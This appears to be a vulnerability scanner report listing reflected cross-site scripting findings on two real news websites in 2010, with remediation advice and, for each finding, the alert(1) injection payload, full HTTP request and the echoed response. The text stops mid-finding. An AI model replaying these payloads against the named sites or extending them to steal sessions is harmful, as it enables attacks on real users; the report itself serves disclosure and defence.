Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0309"><script>alert(1)</script>efbaba2da5 was submitted in the REST URL parameter 3. This input was echoed as e0309\"><script>alert(1)</script>efbaba2da5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/08/uae-expects-to-offer-all-fiber-network-by-2011e0309"><script>alert(1)</script>efbaba2da5/ HTTP/1.1 Host: broadbandbreakfast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx Date: Mon, 13 Dec 2010 03:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://broadbandbreakfast.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Mon, 13 Dec 2010 03:16:48 GMT Content-Length: 30107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h ...[SNIP]... <form method="post" action="/2010/08/uae-expects-to-offer-all-fiber-network-by-2011e0309\"><script>alert(1)</script>efbaba2da5/#mc_signup_form" id="mc_signup_form"> ...[SNIP]...
1.2. http://broadbandbreakfast.com/2010/08/uae-expects-to-offer-all-fiber-network-by-2011/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42487"><script>alert(1)</script>d73408bf02b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42487\"><script>alert(1)</script>d73408bf02b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/08/uae-expects-to-offer-all-fiber-network-by-2011/?42487"><script>alert(1)</script>d73408bf02b=1 HTTP/1.1 Host: broadbandbreakfast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Dec 2010 03:16:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://broadbandbreakfast.com/xmlrpc.php Link: <http://wp.me/pHCPu-2Nv>; rel=shortlink Content-Length: 52313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb=" ...[SNIP]... <form method="post" action="/2010/08/uae-expects-to-offer-all-fiber-network-by-2011/?42487\"><script>alert(1)</script>d73408bf02b=1#mc_signup_form" id="mc_signup_form"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 773a9"-alert(1)-"c5f3579f949 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010773a9"-alert(1)-"c5f3579f949/10/05/televisa-condiciona-acuerdo-univision HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:16:52 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=88ha7h361bhjdt73i07pckopn6; expires=Wed, 05-Jan-2011 06:50:12 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:16:53 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:16:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 26005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/corporativos/2010773a9"-alert(1)-"c5f3579f949/10/05/televisa-condiciona-acuerdo-univision"); //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb5e7"-alert(1)-"82eee3acf9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010/10fb5e7"-alert(1)-"82eee3acf9f/05/televisa-condiciona-acuerdo-univision HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:01 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=6vrn5k0g3iies5ubtf0eingg85; expires=Wed, 05-Jan-2011 06:50:21 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:02 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:01 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 26005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/corporativos/2010/10fb5e7"-alert(1)-"82eee3acf9f/05/televisa-condiciona-acuerdo-univision"); //--> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ec20"-alert(1)-"5fef75ce9c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010/10/055ec20"-alert(1)-"5fef75ce9c6/televisa-condiciona-acuerdo-univision HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:11 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=ftm0s5mcqupgjfn3iujj36rp15; expires=Wed, 05-Jan-2011 06:50:31 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:12 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 26005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/corporativos/2010/10/055ec20"-alert(1)-"5fef75ce9c6/televisa-condiciona-acuerdo-univision"); //--> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b741"-alert(1)-"9bdae50ed81 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010/10/05/televisa-condiciona-acuerdo-univision6b741"-alert(1)-"9bdae50ed81 HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:19 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=d3c7p5qll2v3gk92lq1m0ujdq2; expires=Wed, 05-Jan-2011 06:50:39 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:20 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:19 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 26005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/corporativos/2010/10/05/televisa-condiciona-acuerdo-univision6b741"-alert(1)-"9bdae50ed81"); //--> ...[SNIP]...
1.7. http://eleconomista.com.mx/corporativos/2010/10/05/televisa-condiciona-acuerdo-univision [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a2b4"-alert(1)-"e5522e8863a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010/10/05/televisa-condiciona-acuerdo-univision?3a2b4"-alert(1)-"e5522e8863a=1 HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:16:00 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=8re538vf9sagj99nqlta6h9cg2; expires=Wed, 05-Jan-2011 06:49:20 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:16:01 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:16:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 45226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/corporativos/2010/10/05/televisa-condiciona-acuerdo-univision?3a2b4"-alert(1)-"e5522e8863a=1"); //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86840"-alert(1)-"c2f584476e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/201086840"-alert(1)-"c2f584476e0/02/21/mira-industria HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:11:11 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=igll2ggg61p6cob8tf77m84ea1; expires=Wed, 05-Jan-2011 06:44:31 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:11:12 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:11:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 32028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industria-global/201086840"-alert(1)-"c2f584476e0/02/21/mira-industria"); //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7923"-alert(1)-"c93556a5fa1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/2010/02b7923"-alert(1)-"c93556a5fa1/21/mira-industria HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:11:30 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=5hup7host2ggl6a7vfn1el1q02; expires=Wed, 05-Jan-2011 06:44:50 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:11:31 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:11:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 32028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industria-global/2010/02b7923"-alert(1)-"c93556a5fa1/21/mira-industria"); //--> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9784"-alert(1)-"1d6e4d1a3c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/2010/02/21d9784"-alert(1)-"1d6e4d1a3c3/mira-industria HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:40 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=hnr5atsn6cq2tqipmmfoch9eb7; expires=Wed, 05-Jan-2011 06:51:00 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:41 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 32028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industria-global/2010/02/21d9784"-alert(1)-"1d6e4d1a3c3/mira-industria"); //--> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cfc5"-alert(1)-"189308f1348 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/2010/02/21/mira-industria8cfc5"-alert(1)-"189308f1348 HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:57 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=m7t8qr8bf57oh4acjil8fp58h4; expires=Wed, 05-Jan-2011 06:51:17 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:58 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 32028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industria-global/2010/02/21/mira-industria8cfc5"-alert(1)-"189308f1348"); //--> ...[SNIP]...
1.12. http://eleconomista.com.mx/industria-global/2010/02/21/mira-industria [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://eleconomista.com.mx
Path:
/industria-global/2010/02/21/mira-industria
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9114c"-alert(1)-"af39dcc9fff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/2010/02/21/mira-industria?9114c"-alert(1)-"af39dcc9fff=1 HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:16:02 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=od2okgejadm1opeduf5vja0rr7; expires=Wed, 05-Jan-2011 06:49:22 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:16:03 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:16:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 43231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industria-global/2010/02/21/mira-industria?9114c"-alert(1)-"af39dcc9fff=1"); //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54760"-alert(1)-"18af1847e48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/201054760"-alert(1)-"18af1847e48/06/21/sector-telecom-ganara-mayor-competencia-analistas HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:04 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=lcesionb02pesopk908apesqe7; expires=Wed, 05-Jan-2011 06:50:24 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:05 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 31967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industrias/201054760"-alert(1)-"18af1847e48/06/21/sector-telecom-ganara-mayor-competencia-analistas"); //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b843c"-alert(1)-"4b514251d34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/2010/06b843c"-alert(1)-"4b514251d34/21/sector-telecom-ganara-mayor-competencia-analistas HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:23 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=stkcdo81eqap04i4h7848jpdj7; expires=Wed, 05-Jan-2011 06:50:43 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:24 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 31967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industrias/2010/06b843c"-alert(1)-"4b514251d34/21/sector-telecom-ganara-mayor-competencia-analistas"); //--> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca073"-alert(1)-"76e72ea1883 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/2010/06/21ca073"-alert(1)-"76e72ea1883/sector-telecom-ganara-mayor-competencia-analistas HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:42 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=bhspqa4d6uev3egdd1a528dqi2; expires=Wed, 05-Jan-2011 06:51:02 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:43 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 31967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industrias/2010/06/21ca073"-alert(1)-"76e72ea1883/sector-telecom-ganara-mayor-competencia-analistas"); //--> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd318"-alert(1)-"d3ee9d4d75d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistasfd318"-alert(1)-"d3ee9d4d75d HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
